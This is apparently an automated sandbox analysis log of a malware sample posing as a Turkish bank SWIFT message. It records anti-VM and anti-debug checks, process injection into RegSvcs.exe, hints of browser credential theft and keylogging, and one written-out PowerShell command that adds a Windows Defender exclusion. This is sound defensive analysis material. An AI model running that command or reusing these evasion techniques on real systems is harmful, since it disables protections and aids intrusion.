Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7752, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2656, type: MEMORYSTR

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	API/Special instruction interceptor: Address: 196A924
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	API/Special instruction interceptor: Address: 187EDA4

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 1740000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 3110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 5110000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 6820000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Memory allocated: 2E920000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Memory allocated: EA0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Memory allocated: 2C70000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Memory allocated: 28F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 1670000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 30C0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Memory allocated: 2E70000 memory reserve \| memory write watch

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Code function: 3_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,CloseHandle,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,

3_2_004019F0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\wscript.exe

Window found: window name: WSH-Timer

Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5156	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2021	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Window / User API: threadDelayed 1907
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Window / User API: threadDelayed 7882

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Evaded block: after key decision	graph_0-94806
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Evaded block: after key decision	graph_0-95886
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Evaded block: after key decision

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	API coverage: 4.6 %
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	API coverage: 4.7 %

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe TID: 7824	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8032	Thread sleep count: 5156 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8080	Thread sleep time: -9223372036854770s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8028	Thread sleep count: 2021 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8052	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7940	Thread sleep time: -114420000s >= -30000s
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe TID: 7940	Thread sleep time: -472920000s >= -30000s

Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe

Last function: Thread delayed

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000E6CA9 GetFileAttributesW,FindFirstFileW,FindClose,	0_2_000E6CA9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000E60DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	0_2_000E60DD
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000E63F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	0_2_000E63F9
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000EEB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000EEB60
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000EF56F FindFirstFileW,FindClose,	0_2_000EF56F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000EF5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	0_2_000EF5FA
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000F1B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000F1B2F
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000F1C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	0_2_000F1C8A
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000F1F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	0_2_000F1F94
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00636CA9 GetFileAttributesW,FindFirstFileW,FindClose,	2_2_00636CA9
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006360DD _wcscat,_wcscat,__wsplitpath,FindFirstFileW,DeleteFileW,_wcscpy,_wcscat,_wcscat,lstrcmpiW,DeleteFileW,MoveFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindNextFileW,FindClose,FindClose,	2_2_006360DD
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006363F9 _wcscat,__wsplitpath,FindFirstFileW,_wcscpy,_wcscat,_wcscat,DeleteFileW,FindNextFileW,FindClose,	2_2_006363F9
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0063EB60 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_0063EB60
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0063F56F FindFirstFileW,FindClose,	2_2_0063F56F
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0063F5FA FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,	2_2_0063F5FA
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00641B2F SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00641B2F
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00641C8A SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,	2_2_00641C8A
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00641F94 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,	2_2_00641F94

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000BDDC0 GetVersionExW,GetCurrentProcess,FreeLibrary,GetNativeSystemInfo,FreeLibrary,FreeLibrary,GetSystemInfo,GetSystemInfo,

0_2_000BDDC0

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Thread delayed: delay time: 60000

Source: wscript.exe, 0000000B.00000002.1459381789.0000017E925E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 1efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f
Source: wscript.exe, 0000000B.00000002.1459381789.0000017E925E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: server01.exe, 00000005.00000002.2579272048.0000000000D93000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll%
Source: wscript.exe, 0000000B.00000002.1459381789.0000017E925E6000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\D

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	API call chain: ExitProcess graph end node			graph_0-94929
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\AppData\Local\Temp\server01.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000F6AAF BlockInput,

0_2_000F6AAF

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000A3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_000A3D19

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000D3920 LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,IsDebuggerPresent,OutputDebugStringW,

0_2_000D3920

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

3_2_004019F0

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000BE01E LoadLibraryA,GetProcAddress,

0_2_000BE01E

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_00C08058 mov eax, dword ptr fs:[00000030h]	0_2_00C08058
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_00C069A8 mov eax, dword ptr fs:[00000030h]	0_2_00C069A8
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_00C07FF8 mov eax, dword ptr fs:[00000030h]	0_2_00C07FF8
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_01969540 mov eax, dword ptr fs:[00000030h]	2_2_01969540
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0196AB90 mov eax, dword ptr fs:[00000030h]	2_2_0196AB90
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_0196ABF0 mov eax, dword ptr fs:[00000030h]	2_2_0196ABF0
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 12_2_0187F010 mov eax, dword ptr fs:[00000030h]	12_2_0187F010
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 12_2_0187D9C0 mov eax, dword ptr fs:[00000030h]	12_2_0187D9C0
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 12_2_0187F070 mov eax, dword ptr fs:[00000030h]	12_2_0187F070

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000DA66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,

0_2_000DA66C

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\server01.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ACCApi\apihost.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000C8189 SetUnhandledExceptionFilter,	0_2_000C8189
Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Code function: 0_2_000C81AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_000C81AC
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_006181AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_006181AC
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Code function: 2_2_00618189 SetUnhandledExceptionFilter,	2_2_00618189
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040CE09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_0040E61C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_00416F6A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 3_2_004123F1 SetUnhandledExceptionFilter,	3_2_004123F1

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

.NET source code references suspicious native API functions

Source: server01.exe.3.dr, UltraSpeed.cs	Reference to suspicious API methods: MapVirtualKey(VKCode, 0u)
Source: server01.exe.3.dr, FFDecryptor.cs	Reference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
Source: server01.exe.3.dr, FFDecryptor.cs	Reference to suspicious API methods: hModuleList.Add(LoadLibrary(text9 + "\\mozglue.dll"))

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'
Source: C:\Users\user\AppData\Local\Temp\Trading_AIBot.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming\ACCApi'			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Section loaded: NULL target: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe protection: execute and read and write

Writes to foreign memory regions

Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: AAD008			Jump to behavior
Source: C:\Users\user\AppData\Local\cyclop\directiveness.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 10EE008

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000DB106 LogonUserW,

0_2_000DB106

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000A3D19 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,

0_2_000A3D19

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000E411C SendInput,keybd_event,

0_2_000E411C

Source: C:\Users\user\Desktop\Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe

Code function: 0_2_000E74BB mouse_event,

0_2_000E74BB

